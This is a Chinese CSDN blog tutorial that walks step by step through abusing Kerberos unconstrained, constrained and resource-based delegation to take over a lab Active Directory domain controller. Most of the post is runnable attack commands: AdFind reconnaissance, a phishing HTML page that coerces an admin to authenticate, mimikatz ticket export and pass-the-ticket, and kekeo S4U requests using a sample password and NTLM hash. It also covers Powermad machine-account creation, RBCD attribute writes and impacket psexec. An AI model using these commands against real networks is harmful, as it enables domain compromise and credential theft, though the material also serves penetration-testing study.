内网渗透之横向移动 委派-非约束委派&约束委派&资源委派

最新推荐文章于 2024-05-31 10:46:10 发布
最新推荐文章于 2024-05-31 10:46:10 发布
阅读量696 收藏 1
点赞数 1
分类专栏: 内网渗透 文章标签: java 网络 服务器 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62207170/article/details/130524565
版权

0x01 横向移动-非约束委派

原理:
机器A(域控)访问具有非约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用。从而机器B就能使用这个TGT模拟认证用户(域管用户)访问服务
利用场景
攻击者拿到了一台配置非约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户,利用方式和ptt类似(需要有票据)

复现配置:
环境:god.org
1.信任此计算机来委派任何服务
在这里插入图片描述
2.setspn -U -A priv/test webadmin
在这里插入图片描述
准备:
werserver上线cs
进行提权

判断查询:
有主机名和用户账号设置了非约束才可以使用
查询域内设置了非约束委派的服务账户:

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

查询域内设置了非约束委派的机器账户:

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))" dn

在这里插入图片描述

利用:
1.域控与委派机器通讯
主动:

net use \\webserver

钓鱼:
http://192.168.3.31/31.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="file:///\\192.168.3.31\2">
</body>
</html>

2.导出票据到本地

mimikatz sekurlsa::tickets /export

在这里插入图片描述
3.导入票据到内存

mimikatz kerberos::ptt [0;e949e]-2-0-60a00000-Administrator@krbtgt-GOD.ORG.kirbi

在这里插入图片描述
4.连接域控

dir \\owa2010cn-god\c$

在这里插入图片描述

0x02 内网横向移动-约束委派
原理:
由于非约束委派的不安全性,微软在windows server 2003中引入了约束委派,对Kerberos协议进行了拓展,
引入了SService for User to Self (S4U2Self)和 Service for User to Proxy (S4U2proxy)。

利用场景:
如果攻击者控制了服务A的账号,并且服务A配置了到域控的CIFS服务的约束性委派
则攻击者可以先使用S4u2seflt申请域管用户(administrator)访问A服务的ST1,
然后使用S4u2Proxy以administrator身份访问域控的CIFS服务,即相当于控制了域控

复现配置:
1.机器设置仅信任此计算机指定服务-cifs
在这里插入图片描述
2.用户设置仅信任此计算机指定服务-cifs
在这里插入图片描述
用户名和机器名都配置成owa的账号
准备:
werserver上线cs
进行提权

判断查询:
查询机器用户(主机)配置约束委派

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306369)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

查询服务账户(主机)配置约束委派

AdFind -b "DC=god,DC=org" -f "(&(samAccountType=805306368)(msds-allowedtodelegateto=*))" msds-allowedtodelegateto

在这里插入图片描述

利用步骤:
1.获取用户的票据
明文

shell kekeo "tgt::ask /user:webadmin /domain:god.org /password::admin!@#45 /ticket:administrator.kirbi" "exit"

ntml hash值

shell  kekeo "tgt::ask /user:webadmin /domain:god.org /NTLM:518b98ad4178a53695dc997aa02d455c /ticket:administrator.kirbi" "exit"

2.利用用户票据获取域控票据
选用一个服务即可,上方第一个查询返回的值

shell  kekeo "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god" "exit"

在这里插入图片描述

shell  kekeo "tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god.god.org" "exit"

3.导入票据到内存

mimikatz kerberos::ptt TGS_Administrator@god.org@GOD.ORG_cifs~owa2010cn-god@GOD.ORG

4.连接域控

shell dir \\owa2010cn-god.god.org\c$

在这里插入图片描述

0x03横向移动-资源委派

基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。

计算机加⼊域时,加⼊域的域⽤户被控后也将导致使用当前域用户加入的计算机受控。(利用域用户加域的计算机)

条件:
1.域控Windows2012及以上
2.存在域内成员用户加入域操作
工具:
sid2user
Powermad
impacket
环境:
win7
win2008
win2012

1.获取受害目标:有哪些域内计算机存在同一用户加入的,必须有sid值一致的才能进行攻击

AdFind.exe -h 192.168.3.33 -b "DC=xiaodi,DC=local" -f "objectClass=computer" mS-DS-CreatorSID

在这里插入图片描述
判断受害用户:

sid2user.exe \\192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

在这里插入图片描述

2.增加机器:
powershell

Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount serviceA -Password $(ConvertTo-SecureString "123456" -AsPlainText -Force)

获取sid:

Import-Module .\PowerView.ps1
Get-NetComputer serviceA -Properties objectsid
获取到的sid值
S-1-5-21-1695257952-3088263962-2055235443-1602

在这里插入图片描述

3.设置修改属性
powershell

Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1107)"
$SDBytes = New-Object byte[] ($SD.BinaryLength)
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer DATA| Set-DomainObject -Set @{'msds-allowedtoactonbehalfofotheridentity'=$SDBytes} -Verbose

在这里插入图片描述
验证修改是否成功:

Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity

在这里插入图片描述
清除修改设置:

Set-DomainObject DATA -Clear 'msds-allowedtoactonbehalfofotheridentity' -Verbose

4.连接目标获取票据:

python getST.py -dc-ip 192.168.3.33 xiaodi.local/serviceA\$:123456 -spn cifs/data.xiaodi.local -impersonate administrator

在这里插入图片描述
5.导入票据到内存:

mimikatz kerberos::ptc administrator.ccache

在这里插入图片描述
6.连接利用票据:

dir \\data.xiaodi.local\c$
python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass

在这里插入图片描述
关于 getST.py报错:
在这里插入图片描述
进入到impaket的包里

python setup.py install

python 应该是有版本限制的3.8,3.9
3.10版本是不行的,再就是直接安装impacket也会出错,所以使用上面的方法安装

mushangqiujin
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
1_内网渗透内网穿透-FRP搭建与流量分析.pdf
09-19
1_内网渗透内网穿透-FRP搭建与流量分析.pdf
内网渗透知识大全1-87章全部教程
04-08
1.内网渗透(一)之基础知识-内网渗透介绍和概述 2.内网渗透(二)之基础知识-工作组介绍 3.内网渗透(三)之基础知识-域环境的介绍和优点 4.内网渗透(四)之基础知识-搭建域环境 5.内网渗透(五)之基础知识-Active ...
内网横向移动约束委派&约束委派
剁椒鱼头没剁椒的博客
08-01 628
在Windows 2000 Server首次发布Active Directory时,Microsoft必须提供一种简单的机制来支持用户通过kerberos向web server进行身份验证并需要代表该用户更新后端数据库服务器上的记录的方案。这通常称为"kerberos双跳问题",并且要求进行委派,以便web server在修改数据库记录时模拟用户。
内网安全约束委派 约束委派 资源约束委派
qq_61553520的博客
01-28 1525
实验靶场:redteam.red。
内网安全横向移动&约束委派&约束委派&资源约束委派&数据库攻防
今天是几号的博客
04-05 1138
由于约束委派的不安全性,微软在windows server 2003中引入了约束委派,对Kerberos协议进行了拓展,总的来说,如果需要在Windows环境中使用委派功能,建议使用约束委派而不是约束委派,以提高系统和数据的安全性。攻击者拿到了一台配置约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。机器A(域控)访问具有约束委派权限的机器B的服务,会把当前认证用户(域管用户)的的TGT放在ST票据中,
内网安全横向移动-域渗透之资源约束委派
今天是几号的博客
04-06 594
基于资源约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。计算机加⼊域时,加⼊域的域⽤户被控后也将导致使用当前域用户加入的计算机受控。
内网安全-横向移动约束委派&约束委派
weixin_58782362的博客
11-02 209
原理:机器A(域控)访问具有约束委派权限的机器B的服务,会把当前认证用户(域管用户)的TGT放在ST票据中,一起发送给机器B,机器B会把TGT存储在lsass进程中以备下次重用,从而机器B就能使用这个TGT模拟认证用户(域管用户)访问服务。利用场景:攻击者拿到一台配置约束委派的机器权限,可以诱导域管来访问该机器,然后得到管理员的TGT,从而模拟域管用户。由于约束委派的不安全,微软在windows server 2003中引入约束委派,对kerberos协议进行了拓展。
域内攻击 ----->约束&&约束委派攻击
huohaowen的博客
05-25 799
首先,什么是委派呢?域委派是指将域内用户的权限委派给服务账户,使得服务账号能够以用户的权限在域内展开活动接着,什么样的对象才能被委派呢?主机账号:活动目中中的Computers组内的计算机,也被称为机器账号服务账号:域内用户的一种类型,是服务器运行服务时所用的账号。那么我们去域控上面看一看,顺便说一下本次实验环境后续实验环境皆在此基础上进行先来看机器账号,怎么查看域内的机器有几台呢?完了喜欢eason被你发现捏然后我们去域控上看,DEV和COMPUTERS这两个组。
内网安全横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
今天是几号的博客
04-02 917
攻击者伪造一个恶意的SMB服务器,当内网中有机器Client1(webserver)访问这个攻击者精心构造好的SMB服务器时, smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ,然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给 Client2(sqlserver)。Exchange,LLMNR投毒,
电脑教程内网渗透内网穿透.rar
10-25
电脑教程内网渗透内网穿透
内网渗透之端口转发-内网代理1
08-03
①正向代理 (Forward Proxy) ②反向代理(reverse proxy) ③区分 ①内网机器上执行:lcx.exe –slave 公网 IP + 端
内网渗透之域渗透.pdf
08-07
目录 工作组&域 域的渗透姿势 MS14-068 致谢
operator <=> (spaceship operator)
janeqi1987的专栏
05-28 1007
= 与!= 操作符为了检查是否相等,现在定义== 操作符就够了。当编译器找不到表达式的匹配声明a!=b 时,编译器会重写表达式并查找!(a==b)。若这不起作用,编译器也会尝试改变操作数的顺序,所以也会尝试!(b==a):a!=b,!(b==a)因此,对于TypeA 的a 和TypeB 的b,编译器将能够识别并编译a!= b若需要的话,可以这样做• 一个独立函数operator!• 一个独立函数operator==(TypeA, TypeB)
Java 异常处理中try-catch块、finally子句以及自定义异常的使用
最新发布
Itmastergo的博客
05-31 804
异常是程序运行过程中出现的正常情况。Java 使用异常类(Exception 类及其子类)来表示这些异常情况。异常处理的核心思想是将正常的程序流程与异常处理流程分离开来,使代码更加清晰和可维护。Throwable 类:所有异常和错误的基类。Error 类:表示系统级的错误,程序通常无法处理,比如内存不足(OutOfMemoryError)。Exception 类:表示程序中可以处理的异常情况。RuntimeException 类。
Java手动启动jar包
liangweihao的博客
05-29 296
【代码】Java手动启动jar包。
java调用cmd执行命令
weixin_45210565的博客
05-28 260
3、exec(String command, String[] envp) ,在调用外部程序之前设置系统环境变量,该变量仅供command入参使用,envp每个元素为一个系统环境变量,并且字符串格式为“环境变量名=环境变量值”。2、exec(String[] cmdArray) ,调用外部程序,入参cmdArray的元素将组合成为一条完整的外部可执行程序的启动路径或命令。1、exec(String command) ,调用外部程序,入参command为外部可执行程序的启动路径或命令。
Java面向数据编程1.1版本
极道Jdon的技术博客
05-28 510
虽然将所有这些方法都集中在 Item 上似乎是合理的,因为它们都与购买流程交互,但增加了 predictLowStock(与基于机器学习的预购系统交互)、registerForRecommendations(另一个 ML 系统,这次是物品建议)和 reportPurchase(登记潜在危险物品的购买),让我们怀疑所有这些操作是否真的属于同一个接口。:这是不同上下文场景的方式,放在Item一个类或接口中肯定不对,如同学生借书,将借书这个动作建模在学生这个类或接口一样,借书时一种具体场景。
java多线程创建方式
weixin_57763462的博客
05-28 1076
这种方式是通过创建一个实现了Runnable接口的类,并实现run()方法来创建线程。然后将这个类的对象作为参数传递给Thread类的构造器,并调用Thread对象的start()方法来启动线程。这种方式是通过创建一个实现了Callable接口的类,实现call()方法,并使用FutureTask或者ExecutorService来创建线程。这种方式的优点在于,由于Java不支持多重继承,如果你的类需要继承其他类,那么实现Runnable接口将是唯一的选择。// 在这里定义线程的执行逻辑。
内网渗透--ICMP隧道
05-16
ICMP隧道是一种利用Internet控制消息协议(ICMP)的技术,将其他协议的数据包封装在ICMP数据包中,从而在不被检测的情况下在网络中传输数据。对于内网渗透而言,ICMP隧道可以用于将攻击者的数据从受害主机中转出,绕过防火墙和其他网络安全设备的检测和过滤。 ICMP隧道的实现需要两个端点:一个客户端和一个服务器端。客户端将要传输的数据封装在ICMP数据包中发送给服务器端,服务器端接收到ICMP数据包后解析其中的数据,然后将数据还原成原始数据包,再转发给目标主机。通过这种方式,攻击者可以在内网中传输各种类型的数据,包括命令和控制信息。 然而,ICMP隧道也有缺点。由于ICMP数据包通常被认为是网络的一部分,因此可能不会被网络安全设备视为可疑流量。然而,如果攻击者的网络流量被监测到,这种技术可能被检测出来,因此需要谨慎使用。此外,ICMP隧道还可能会导致网络延迟和丢包等问题,影响传输速度和数据完整性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值